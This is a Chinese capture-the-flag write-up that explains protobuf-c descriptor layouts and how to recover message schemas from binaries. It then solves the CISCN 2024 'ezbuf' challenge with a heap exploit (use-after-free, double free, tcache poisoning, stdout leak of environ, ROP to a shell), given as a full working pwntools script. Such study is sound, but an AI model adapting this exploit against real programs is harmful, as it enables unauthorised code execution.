protobuf

Protobuf(Protocol Buffers)是谷歌开发的一种与平台和语言无关、可扩展、轻量高效的结构化数据序列化格式,也是一种高效的数据压缩编码方式,可用于通信协议、数据存储等。

能够将数据结构体序列化为bytes字节流,也能将bytes字节流反序列化成数据结构体。

安装protobuf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Tested on Ubuntu 22.04.
# Build dependencies (pkg-config is required by protobuf-c's configure script).
sudo apt-get install autoconf automake libtool curl make g++ unzip pkg-config

# Build and install protobuf. Use a release newer than 3.20, otherwise
# dependency problems show up later.
git clone -b v3.21.0 https://github.com/protocolbuffers/protobuf.git
cd protobuf
./autogen.sh                # generate the configure script
./configure                 # optional: --prefix=path (default is /usr/local/)
make -j"$(nproc)"
sudo make install
sudo ldconfig               # refresh the shared-library cache so protoc finds libprotobuf
protoc --version            # check that protoc was installed correctly
cd ..

# Build and install protobuf-c.
git clone https://github.com/protobuf-c/protobuf-c.git
cd protobuf-c
./autogen.sh && ./configure
make -j"$(nproc)"
sudo make install
sudo ldconfig
cd ..

Protobuf的使用以及逆向分析

首先创建一个简单的proto例子:

1
2
3
4
5
6
7
8
// Minimal example schema used in the rest of this article.
syntax = "proto3";

// Four fields; the number after '=' is the field number that later appears
// as `id` in the generated C field descriptors.
message devicemsg{
bytes con = 1; // PROTOBUF_C_TYPE_BYTES in the generated descriptor
sint64 idx = 2; // PROTOBUF_C_TYPE_SINT64 in the generated descriptor
sint64 size = 3; // PROTOBUF_C_TYPE_SINT64 in the generated descriptor
sint64 chunk_this = 4; // PROTOBUF_C_TYPE_SINT64 in the generated descriptor
}

分析C语言中的内容

1
protoc --c_out=./ z0yuan.proto

--c_out=./将.proto文件以c语言格式输出在当前目录下,之后会生成z0yuan.pb-c.c 、z0yuan.pb-c.h两个文件。

查看.c文件内容

关键函数——序列化函数和反序列化函数

1
2
3
4
5
6
7
8
9
/**
 * Serialize a Devicemsg into a caller-supplied buffer.
 *
 * @param message  Message to serialize; its base descriptor must be
 *                 devicemsg__descriptor (checked with assert).
 * @param out      Destination buffer for the encoded bytes.
 * @return         The value returned by protobuf_c_message_pack().
 */
size_t devicemsg__pack(const Devicemsg *message, uint8_t *out) {
    const ProtobufCMessage *generic = (const ProtobufCMessage *)message;

    /* Guard against being handed a message of a different generated type. */
    assert(message->base.descriptor == &devicemsg__descriptor);
    return protobuf_c_message_pack(generic, out);
}

/**
 * Deserialize a byte stream into a Devicemsg.
 *
 * @param allocator  Allocator handed through to protobuf_c_message_unpack().
 * @param len        Length of the encoded packet in bytes.
 * @param data       Encoded packet.
 * @return           Result of protobuf_c_message_unpack() for
 *                   devicemsg__descriptor, cast to Devicemsg *.
 */
Devicemsg *devicemsg__unpack(ProtobufCAllocator *allocator, size_t len, const uint8_t *data) {
    ProtobufCMessage *decoded =
        protobuf_c_message_unpack(&devicemsg__descriptor, allocator, len, data);

    return (Devicemsg *)decoded;
}

pack用来序列化得到bytes字节流,unpack用来反序列化得到结构数据。

注意看unpack函数:第一个参数allocator一般为0(即NULL,表示使用默认分配器),第二个参数为数据包长度,第三个参数是数据字节流。它通过调用库函数protobuf_c_message_unpack来实现反序列化,将字节流数据转化为结构数据。其中devicemsg__descriptor就是描述先前定义的message结构的数据。返回值是指向反序列化后得到的message结构体的指针。

描述符结构体

devicemsg__descriptor为ProtobufCMessageDescriptor类型的一个结构。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/**
* Describes a message.
*
* Reverse-engineering note: the "+0x.." offsets in the member comments
* assume an LP64 target (8-byte pointers and size_t, 4-byte unsigned,
* natural alignment), which gives a 0x78-byte structure. Confirm against
* the binary being analysed.
*/
struct ProtobufCMessageDescriptor {
/** Magic value checked to ensure that the API is used correctly. (+0x00, typically 0x28AAEEF9) */
uint32_t magic;

/** The qualified name (e.g., "namespace.Type"). (+0x08) */
const char *name;
/** The unqualified name as given in the .proto file (e.g., "Type"). (+0x10) */
const char *short_name;
/** Identifier used in generated C code. (+0x18) */
const char *c_name;
/** The dot-separated namespace. (+0x20) */
const char *package_name;

/**
* Size in bytes of the C structure representing an instance of this
* type of message. (+0x28)
*/
size_t sizeof_message;

/** Number of elements in `fields`. (+0x30) */
unsigned n_fields;
/** Field descriptors, sorted by tag number. (+0x38) */
const ProtobufCFieldDescriptor *fields;
/** Used for looking up fields by name. (+0x40) */
const unsigned *fields_sorted_by_name;

/** Number of elements in `field_ranges`. (+0x48) */
unsigned n_field_ranges;
/** Used for looking up fields by id. (+0x50) */
const ProtobufCIntRange *field_ranges;

/** Message initialisation function. (+0x58) */
ProtobufCMessageInit message_init;

/** Reserved for future use. (+0x60) */
void *reserved1;
/** Reserved for future use. (+0x68) */
void *reserved2;
/** Reserved for future use. (+0x70) */
void *reserved3;
};

关键点:

  1. magic,一般为0x28AAEEF9
  2. n_fields,关系到原始的message结构内有几条记录(本篇例子中有4条记录)
  3. fields,这个指向message内所有记录类型组成的一个数组,可以借助此部分内容逆向分析message结构。

fields结构体

重点要看fields,这个是ProtobufCFieldDescriptor类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/**
* Describes a single field of a message.
*
* Reverse-engineering note: the "+0x.." offsets in the member comments
* assume an LP64 target (8-byte pointers, 4-byte enums and unsigned,
* natural alignment), which gives a 0x48-byte structure per field.
* Confirm against the binary being analysed.
*/
struct ProtobufCFieldDescriptor {
/** Name of the field as given in the .proto file. (+0x00) */
const char *name;
/** Tag value of the field as given in the .proto file. (+0x08) */
uint32_t id;
/** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. (+0x0c) */
ProtobufCLabel label;
/** The type of the field. (+0x10) */
ProtobufCType type;
/**
* The offset in bytes of the message's C structure's quantifier field
* (the `has_MEMBER` field for optional members or the `n_MEMBER` field
* for repeated members or the case enum for oneofs). (+0x14)
*/
unsigned quantifier_offset;
/**
* The offset in bytes into the message's C structure for the member
* itself. (+0x18, followed by 4 bytes of padding)
*/
unsigned offset;
/**
* A type-specific descriptor. (+0x20)
*
* If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the
* corresponding `ProtobufCEnumDescriptor`.
*
* If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to
* the corresponding `ProtobufCMessageDescriptor`.
*
* Otherwise this field is NULL.
*/
const void *descriptor; /* for MESSAGE and ENUM types */
/** The default value for this field, if defined. May be NULL. (+0x28) */
const void *default_value;
/**
* A flag word. Zero or more of the bits defined in the
* `ProtobufCFieldFlag` enum may be set. (+0x30)
*/
uint32_t flags;
/** Reserved for future use. (+0x34) */
unsigned reserved_flags;
/** Reserved for future use. (+0x38) */
void *reserved2;
/** Reserved for future use. (+0x40) */
void *reserved3;
};

关键点:

  1. name,名字,变量名
  2. id,字段编号(即.proto文件中“=”后面的tag值)
  3. label(在proto2语法中对应的是required、optional、repeated)
  4. type,数据类型,string还是int64等,label和type都是枚举类型,占四个字节。

类型表

从0开始

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/**
 * Field value types.
 *
 * Enumerators are numbered consecutively from 0; the values are spelled out
 * so the number found in a field descriptor's `type` member can be looked up
 * directly.
 */
typedef enum {
    PROTOBUF_C_TYPE_INT32    = 0,  /**< int32 */
    PROTOBUF_C_TYPE_SINT32   = 1,  /**< signed int32 */
    PROTOBUF_C_TYPE_SFIXED32 = 2,  /**< signed int32 (4 bytes) */
    PROTOBUF_C_TYPE_INT64    = 3,  /**< int64 */
    PROTOBUF_C_TYPE_SINT64   = 4,  /**< signed int64 */
    PROTOBUF_C_TYPE_SFIXED64 = 5,  /**< signed int64 (8 bytes) */
    PROTOBUF_C_TYPE_UINT32   = 6,  /**< unsigned int32 */
    PROTOBUF_C_TYPE_FIXED32  = 7,  /**< unsigned int32 (4 bytes) */
    PROTOBUF_C_TYPE_UINT64   = 8,  /**< unsigned int64 */
    PROTOBUF_C_TYPE_FIXED64  = 9,  /**< unsigned int64 (8 bytes) */
    PROTOBUF_C_TYPE_FLOAT    = 10, /**< float */
    PROTOBUF_C_TYPE_DOUBLE   = 11, /**< double */
    PROTOBUF_C_TYPE_BOOL     = 12, /**< boolean */
    PROTOBUF_C_TYPE_ENUM     = 13, /**< enumerated type */
    PROTOBUF_C_TYPE_STRING   = 14, /**< UTF-8 or ASCII string */
    PROTOBUF_C_TYPE_BYTES    = 15, /**< arbitrary byte sequence */
    PROTOBUF_C_TYPE_MESSAGE  = 16, /**< nested message */
} ProtobufCType;

结构体信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
static const ProtobufCFieldDescriptor devicemsg__field_descriptors[4] =
{
{
"con",
1,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_BYTES,
0, /* quantifier_offset */
offsetof(Devicemsg, con),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"idx",
2,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, idx),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"size",
3,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, size),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"chunk_this",
4,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, chunk_this),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
};
/*
 * Indices into devicemsg__field_descriptors listed in alphabetical order of
 * field name (chunk_this, con, idx, size); referenced by the message
 * descriptor's fields_sorted_by_name member.
 */
static const unsigned devicemsg__field_indices_by_name[] = {
3, /* field[3] = chunk_this */
0, /* field[0] = con */
1, /* field[1] = idx */
2, /* field[2] = size */
};
/*
 * Range table referenced by the message descriptor's field_ranges member
 * (n_field_ranges = 1, plus one extra trailing entry).
 * NOTE(review): presumably each entry is {first field number, index of that
 * field}, with the trailing { 0, 4 } carrying the total field count; confirm
 * against the ProtobufCIntRange definition in protobuf-c.h.
 */
static const ProtobufCIntRange devicemsg__number_ranges[1 + 1] =
{
{ 1, 0 },
{ 0, 4 }
};
const ProtobufCMessageDescriptor devicemsg__descriptor =
{
PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,
"devicemsg",
"Devicemsg",
"Devicemsg",
"",
sizeof(Devicemsg),
4,
devicemsg__field_descriptors,
devicemsg__field_indices_by_name,
1, devicemsg__number_ranges,
(ProtobufCMessageInit) devicemsg__init,
NULL,NULL,NULL /* reserved[123] */
};

可以分析与ProtobufCFieldDescriptor类型对应的结构来还原message结构体

利用Python配合protobuf打包

执行命令

1
protoc --python_out=./ z0yuan.proto

生成z0yuan_pb2.py

打包模板

1
2
3
4
5
6
7
# Packing template: fill in a devicemsg and serialize it to bytes.
# con / idx / size / this are placeholders for the values you want to send.
import z0yuan_pb2  # import by module name; a ".py" suffix makes the import fail

data = z0yuan_pb2.devicemsg()  # class name follows the message name in the .proto
data.con = con
data.idx = idx
data.size = size
data.chunk_this = this
payload = data.SerializeToString()  # serialized bytes stream, ready to send

Pbtk提取proto结构

pbtk工具可以直接提取程序中的proto结构,这样就方便生成python包然后进行解题。

1
2
3
4
5
6
# System packages for pbtk: pip, git, a Java runtime and the Qt5 / PyQt5 libraries.
sudo apt install python3-pip git openjdk-9-jre libqt5x11extras5 python3-pyqt5.qtwebengine python3-pyqt5
# Python packages for pbtk.
sudo pip3 install protobuf pyqt5 pyqtwebengine requests websocket-client

# Fetch pbtk and launch its GUI.
git clone https://github.com/marin-m/pbtk
cd pbtk
./gui.py

命令

1
2
cd pbtk
./extractors/from_binary.py 二进制文件 保存提取的proto文件路径

CISCN 2024 ezbuf例题

恢复proto结构体

这道题无法利用工具pbtk直接提取,所以需要手动逆向分析提取。

image-20240702174604857

关键的结构体部分在这,根据这段连续的data来恢复结构体。1代表的是序号,3代表的是label,0xf代表的是Type类型,查表即可

最终恢复proto结构体如下:

1
2
3
4
5
6
7
8
9
// Schema recovered by hand from the field descriptors in the ezbuf binary.
syntax="proto3";

message heybro{
bytes whatcon = 1; // content buffer (descriptor type 0xf = bytes)
sint64 whattodo = 2; // selects which of functions 0-3 the program runs
sint64 whatidx = 3; // chunk index
sint64 whatsize = 4;
uint32 whatsthis = 5;
}

还原C语言的结构体

1
2
3
4
5
6
7
8
9
// ProtobufCMessage: the `base` member placed first in generated message
// structs such as Heybro. With 8-byte pointers the members sit at +0, +8
// and +16, and the structure is 24 bytes after alignment.
struct ProtobufCMessage {
/** The descriptor for this message type. */
const ProtobufCMessageDescriptor *descriptor;
/** The number of elements in `unknown_fields`. */
unsigned n_unknown_fields;
/** The fields that weren't recognized by the parser. */
ProtobufCMessageUnknownField *unknown_fields;
};

结构体大小对齐后是24字节。

bytes类型,转化为c语言结构时会变成一个结构体,里面存放长度和内容指针。

1
2
3
4
/*
 * C representation of a `bytes` field: a length followed by a pointer to the
 * content (16 bytes in total when size_t and pointers are 8 bytes each).
 */
struct ProtobufCBinaryData {
size_t len; /**< Number of bytes in the `data` field. */
uint8_t *data; /**< Data bytes. */
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

/*
 * Self-contained layout of the recovered Heybro message.
 *
 * The supporting types are declared before Heybro, and the bare type names
 * are introduced with typedefs, so the snippet can be compiled or imported
 * into a disassembler's local types as-is. Offsets in the comments assume a
 * 64-bit target (8-byte pointers and size_t).
 */
typedef struct ProtobufCMessageDescriptor ProtobufCMessageDescriptor;
typedef struct ProtobufCMessageUnknownField ProtobufCMessageUnknownField;
typedef struct ProtobufCMessage ProtobufCMessage;
typedef struct ProtobufCBinaryData ProtobufCBinaryData;

struct ProtobufCMessage {
    /** The descriptor for this message type. */
    const ProtobufCMessageDescriptor *descriptor;
    /** The number of elements in `unknown_fields`. */
    unsigned n_unknown_fields;
    /** The fields that weren't recognized by the parser. */
    ProtobufCMessageUnknownField *unknown_fields;
};

struct ProtobufCBinaryData {
    size_t len;    /**< Number of bytes in the `data` field. */
    uint8_t *data; /**< Data bytes. */
};

struct Heybro
{
    ProtobufCMessage base;       /* +0:  24 bytes */
    ProtobufCBinaryData whatcon; /* +24: 16-byte struct holding length and content pointer */
    int64_t whattodo;            /* +40 */
    int64_t whatidx;             /* +48 */
    int64_t whatsize;            /* +56 */
    uint32_t whatsthis;          /* +64 */
};

代码分析

image-20240702175848274

由于ida会把bytes转化的结构体内容当作8字节数组解析,所以前两个实际上是代表同一个记录。

分别对应的是五个记录,而不是ida显示的6个。

其中v4+40对应的是whattodo也就是a3

image-20240702211449513

  • 函数0只是解析数据包,但是会根据数据包的长度申请堆块,比如func0(str) –> malloc(len(str)),实际上就是反序列化数据包时,需要申请一个数据包大小的chunk来保存数据
  • 函数1创建0x30大小的chunk并且将数据(此处的数据就是unpack函数中通过创建堆块来保存的content数据)复制过去
  • 函数2是释放chunk的功能,存在UAF,但是最多释放10次
  • 函数3是打印功能,超过两次会关闭标准输入流和标准输出流

利用思路

先申请0x30大小的chunk来切割unsortedbin泄露libc,然后再释放一个chunk来泄露heap_key和heap_base。利用fastbin中的double_free触发malloc_consolidate使得fastbin中的chunk进入到tcache中,此时可以任意写一次。

image-20240702235952366

观察此时的bin,由于glibc-2.35没有hook,所以可以利用申请到栈中内容打ret2libc。所以此时需要的条件就是泄露出environ的内容,并且能申请到栈内存。

此时就要利用好函数0的功能了,因为函数0虽然只解析数据包,但是会有一步根据数据包长度进行堆块申请的操作。

注意到此时bin中有0xf0,所以可以先修改tcache的fd指针指向tcache_perthread_struct+0xf0,修改内容为tcache_perthread_struct。

image-20240703000503773

可以看到此时0xf0处保存的就是tcache_perthread_struct+0x10。

此时如果触发函数0,并且数据包的长度为0xe0的话,那么数据包的内容就会写入到tcache_perthread_struct+0x10处。那么就可以控制tcachebin中的chunk数量以及chunk指针。我们控制其指向IO_stdout,然后申请出IO_stdout,通过修改write_base和write_ptr来触发IO_leak泄露出environ的内容也就是栈地址,但是需要注意的是还需要控制0xb0处的chunk指针为tcache_perthread_struct+0x10,这样就能再次利用申请出栈内存。

image-20240703000901177

image-20240703000918687

泄露完environ之后的bins:

image-20240703001134857

再利用0xb0这个chunk控制tcache_perthread_struct的内容来申请出栈内存

image-20240703001225093

劫持的是这个函数的返回地址

image-20240703001302510

构造ROP即可触发system('/bin/sh\x00')

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
# Target/terminal configuration for pwntools.
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]

# debug = 1 runs the local binary; anything falsy connects to the remote service.
debug = 1
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('127.0.0.1', 10001)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
# Short aliases around the tube `p` for sending data.
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
# Receiving: note that `rl` is recvuntil(text), not recvline.
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
# Leak helpers: read up to a b'\xf7' / b'\x7f' byte and unpack the trailing
# 4 / 6 bytes as a little-endian address.
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# Leak helpers: unpack the next 4 / 6 received bytes directly.
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
# Parse a hex string, and log a named value in hex.
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
import ezbuf_pb2
libc = ELF('./libc.so.6')
data = ezbuf_pb2.heybro()
def add(idx,content):
    """Send a whattodo=1 request: create chunk `idx` holding `content` (bytes)."""
    rl("WHAT DO YOU WANT?\n")
    data.whatcon = content
    data.whattodo = 1
    data.whatidx = idx
    data.whatsize = 0
    data.whatsthis = 0
    s(data.SerializeToString())
def delete(idx):
    """Send a whattodo=2 request: free chunk `idx`."""
    rl("WHAT DO YOU WANT?\n")
    data.whatcon = b'\x00'
    data.whattodo = 2
    data.whatidx = idx
    data.whatsize = 0
    data.whatsthis = 0
    s(data.SerializeToString())
def show(idx):
    """Send a whattodo=3 request: print chunk `idx`."""
    rl("WHAT DO YOU WANT?\n")
    data.whatcon = b'\x00'
    data.whattodo = 3
    data.whatidx = idx
    data.whatsize = 0
    data.whatsthis = 0
    s(data.SerializeToString())
def clean(mem):
    """Send a whattodo=0 request carrying `mem` (bytes) as the content.

    Function 0 only parses the packet, but unpacking allocates a chunk sized
    by the content, which is what the exploit uses to place `mem` on the heap.
    """
    rl("WHAT DO YOU WANT?\n")
    data.whatcon=mem
    data.whattodo=0
    data.whatidx=0
    data.whatsize=0x20
    data.whatsthis=0x20
    s(data.SerializeToString())


# gdb.attach(p)
# Step 1: allocate nine chunks; they are carved out of the unsorted bin, so
# showing chunk 0 leaks a libc pointer right after the 'aaaaaaab' marker.
for i in range(9):
    add(i,b'aaaaaaab')
show(0)
rl('b')
libc_leak = uu64()
lg("libc_leak",libc_leak)
libc_base = libc_leak-0x21ace0
lg("libc_base",libc_base)
environ = libc_base + libc.sym['environ']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
io_stdout = libc_base + libc.sym['_IO_2_1_stdout_']
ret = 0x000000000002a3e6 + libc_base
pop_rdi = 0x000000000002a3e5 + libc_base

# Step 2: free chunk 0 and print it again (UAF) to leak heap_key, from which
# the heap base is derived.
delete(0)
show(0)
rl("Content:")
heap_key = u64(p.recv(5).ljust(8, b'\x00'))
lg("heap_key",heap_key)
heap_base = heap_key << 12
heap_base = heap_base-0x2000
lg("heap_base",heap_base)

# Step 3: free chunks 1..8, then free chunk 7 a second time (double free).
# Together with delete(0) above this uses all 10 allowed frees.
for i in range(1,9):
    delete(i)
delete(7)
for i in range(7):
    add(i,b'aaaaaaab')
# Step 4: poison the fd so a later allocation lands at
# tcache_perthread_struct+0xf0, then write tcache_perthread_struct+0x10 there.
add(7,p64((heap_key+2)^(heap_base+0xf0)))
add(8,b'aaaaaaab')
add(9,b'aaaaaaab')
add(10,p64(0)+p64(heap_base+0x10))
# Step 5: a 0xe0-byte packet is written to tcache_perthread_struct+0x10,
# setting bin counts and entries: stdout for the leak, and the 0xb0 entry
# pointing back at tcache_perthread_struct+0x10 for reuse.
clean((((p16(0)*2+p16(1)+p16(1)).ljust(0x10,b"\x00")+p16(1)+p16(1)).ljust(0x90,b'\x00')+p64(io_stdout)+p64(io_stdout)+p64(0)*5+p64(heap_base+0x10)).ljust(0xe0,b"\x00"))
# Step 6: overwrite stdout so that write_base/write_ptr span environ, leaking
# a stack address.
clean(p64(0xFBAD1800)+p64(0)*3+p64(environ)+p64(environ+0x8))
stack_addr = l64()-0x168
lg("stack_addr",stack_addr)
# Step 7: rewrite tcache_perthread_struct through the 0xb0 entry so the next
# allocation is served from the stack.
clean(((p16(0)*2+p16(0)+p16(0)+p16(1)).ljust(0x10,b"\x00")+p16(1)+p16(1)).ljust(0x90,b'\x00')+p64(0)+p64(0)+p64(stack_addr))

# Step 8: overwrite the saved return address with the ROP chain
# ret; pop rdi; "/bin/sh"; system.
clean((b"a"*0x8+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)).ljust(0x50,b"\x00"))

inter()

image-20240703001425453

参考

1
2
3
4
https://www.cnblogs.com/JmpCliff/articles/17595397.html
https://www.y4ng.cn/posts/pwn/protobuf/
https://mp.weixin.qq.com/s/RYa2wMD1KIC9IMQ_9NktiQ
https://blog.csdn.net/llovewuzhengzi/article/details/139435895